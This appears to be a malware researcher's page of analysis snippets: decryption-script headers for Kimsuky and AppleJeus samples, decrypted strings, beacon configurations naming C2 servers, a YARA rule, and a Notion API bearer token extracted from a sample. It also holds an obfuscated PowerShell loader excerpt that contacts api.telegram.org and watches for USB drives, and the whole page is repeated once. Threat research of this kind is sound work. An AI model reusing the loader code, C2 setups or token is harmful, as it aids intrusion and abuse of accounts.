usualsuspect

## decrypt_strings.py
#!/usr/bin/env python3
#
# Author: @jaydinbas
# Decrypt strings found in Kimsuky sample
# Reference: https://twitter.com/ShadowChasing1/status/1570601703598338049
# Reference sample: d3930b2494f45bb2c169124d4a39308303b9e8e87043afc54327c1e2a378e4e0
#

import re
import sys

## decrypted_strings.txt
Accept-Encoding
gzip,deflate
Method
POST
win
desktop
art-pc
/
id=
&mail=

## ekun_config.txt
BeaconType                       - HTTP
Port                             - 80
SleepTime                        - 45000
MaxGetSize                       - 1403644
Jitter                           - 37
MaxDNS                           - Not Found
PublicKey_MD5                    - 005a71d162794e4bc436f8a38e017910
C2Server                         - 20.203.182.34,/jwquery-3.3.1.min.js
UserAgent                        - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
HttpPostUri                      - /jwquery-3.3.2.min.js

## config.txt
BeaconType                       - HTTP
Port                             - 80
SleepTime                        - 30000
MaxGetSize                       - 1412693
Jitter                           - 37
MaxDNS                           - Not Found
PublicKey_MD5                    - 319f36ab624b44c836f42decabcfcb6c
C2Server                         - solar.huawei.com,/audiencemanager.js
UserAgent                        - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4044.62 Safari/537.36
HttpPostUri                      - /audiencemanager-v2.js

## core.ps1
 (('[Net.ServicePointManager]::Se'+'curityProtocol=[Net.SecurityProtocolType]::Tls12;
NyQErrorActionPreference=zCwContinuezCw;
NyQa=zCwap'+'i.telegram.orgzCw;
do{Slee'+'p(Get-Random 100)}while'+'((iwr NyQa).StatusCode -ne 20'+'0)
NyQ'+'Query = zCwselect * from __InstanceCreationE'+'vent within 5 where Target'+'Instance'+' ISA sn4Win32_LogicalDisk'+'sn4 and TargetInstance.DriveType = 2zCw;
Ny'+'QAction = {
    (gwmi cim_logicaldiskugE?{(NyQ_.drivetype -eq 2)-and(T'+'est-path '+'z'+'CwNyQ(NyQ_.dev'+'iceid)byfzCw)'+'}).DeviceIDugE%'+'{
       '+' if(NyQnull'+' -eq NyQ_){return}
'+'
        try{Expand-Archive -Path zCwNyQenv:tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:te'+'mpzCw -force}catch{

## applejeus_custom_string_dec.py
#!/usr/bin/env python3

#
#   Author: @jaydinbas
#
#   Custom string decryption used by AppleJeus malware
#   See https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/
#
#   Reference sample: 9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78
#   Found in function sub_180001830

## config.txt
BeaconType                       - SMB
Port                             - 4444
SleepTime                        - 10000
MaxGetSize                       - 2097152
Jitter                           - 0
MaxDNS                           - 0
PublicKey_MD5                    - 5b37cfe101c82935e6034078db979280
C2Server                         -
UserAgent                        -
HttpPostUri                      -

## zip_ext.yara
rule zip_with_ext
{
    meta:
        author = "@jaydinbas"
        description = "Only match zip files containing desired file extensions"

    strings:
        $file_sig = "PK\x03\x04"    //zip header sig
        $entry_sig = "PK\x01\x02"   //ZIPDIRENTRY sig

## strings.txt
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
c:\windows\system32\
content-type: application/json
accept: application/json
notion-version: 2022-06-28
authorization: Bearer secret_X92sXCVWoTk63aPgGKlPBBmHVmuKXJ2geugKa7Ogj7s
api.notion.com
GetProcessImageFileNameA
RegOpenKeyExA
RegSetValueExA

## config.txt
BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 60000
MaxGetSize                       - 1398104
Jitter                           - 30
MaxDNS                           - Not Found
PublicKey_MD5                    - 4dbaa2821fcfa995554ad7612a869a6d
C2Server                         - exdiy.com,/web/portal
UserAgent                        - Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
HttpPostUri                      - /logon/index.php
	#!/usr/bin/env python3
	#
	# Author: @jaydinbas
	# Decrypt strings found in Kimsuky sample
	# Reference: https://twitter.com/ShadowChasing1/status/1570601703598338049
	# Reference sample: d3930b2494f45bb2c169124d4a39308303b9e8e87043afc54327c1e2a378e4e0
	#

	import re
	import sys
	Accept-Encoding
	gzip,deflate
	Method
	POST
	win
	desktop
	art-pc
	/
	id=
	&mail=
	BeaconType - HTTP
	Port - 80
	SleepTime - 45000
	MaxGetSize - 1403644
	Jitter - 37
	MaxDNS - Not Found
	PublicKey_MD5 - 005a71d162794e4bc436f8a38e017910
	C2Server - 20.203.182.34,/jwquery-3.3.1.min.js
	UserAgent - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
	HttpPostUri - /jwquery-3.3.2.min.js
	BeaconType - HTTP
	Port - 80
	SleepTime - 30000
	MaxGetSize - 1412693
	Jitter - 37
	MaxDNS - Not Found
	PublicKey_MD5 - 319f36ab624b44c836f42decabcfcb6c
	C2Server - solar.huawei.com,/audiencemanager.js
	UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4044.62 Safari/537.36
	HttpPostUri - /audiencemanager-v2.js
	(('[Net.ServicePointManager]::Se'+'curityProtocol=[Net.SecurityProtocolType]::Tls12;
	NyQErrorActionPreference=zCwContinuezCw;
	NyQa=zCwap'+'i.telegram.orgzCw;
	do{Slee'+'p(Get-Random 100)}while'+'((iwr NyQa).StatusCode -ne 20'+'0)
	NyQ'+'Query = zCwselect * from __InstanceCreationE'+'vent within 5 where Target'+'Instance'+' ISA sn4Win32_LogicalDisk'+'sn4 and TargetInstance.DriveType = 2zCw;
	Ny'+'QAction = {
	(gwmi cim_logicaldiskugE?{(NyQ_.drivetype -eq 2)-and(T'+'est-path '+'z'+'CwNyQ(NyQ_.dev'+'iceid)byfzCw)'+'}).DeviceIDugE%'+'{
	'+' if(NyQnull'+' -eq NyQ_){return}
	'+'
	try{Expand-Archive -Path zCwNyQenv:tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:te'+'mpzCw -force}catch{
	#!/usr/bin/env python3

	#
	# Author: @jaydinbas
	#
	# Custom string decryption used by AppleJeus malware
	# See https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/
	#
	# Reference sample: 9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78
	# Found in function sub_180001830
	BeaconType - SMB
	Port - 4444
	SleepTime - 10000
	MaxGetSize - 2097152
	Jitter - 0
	MaxDNS - 0
	PublicKey_MD5 - 5b37cfe101c82935e6034078db979280
	C2Server -
	UserAgent -
	HttpPostUri -
	rule zip_with_ext
	{
	meta:
	author = "@jaydinbas"
	description = "Only match zip files containing desired file extensions"

	strings:
	$file_sig = "PK\x03\x04" //zip header sig
	$entry_sig = "PK\x01\x02" //ZIPDIRENTRY sig
	Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
	c:\windows\system32\
	content-type: application/json
	accept: application/json
	notion-version: 2022-06-28
	authorization: Bearer secret_X92sXCVWoTk63aPgGKlPBBmHVmuKXJ2geugKa7Ogj7s
	api.notion.com
	GetProcessImageFileNameA
	RegOpenKeyExA
	RegSetValueExA
	BeaconType - HTTPS
	Port - 443
	SleepTime - 60000
	MaxGetSize - 1398104
	Jitter - 30
	MaxDNS - Not Found
	PublicKey_MD5 - 4dbaa2821fcfa995554ad7612a869a6d
	C2Server - exdiy.com,/web/portal
	UserAgent - Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
	HttpPostUri - /logon/index.php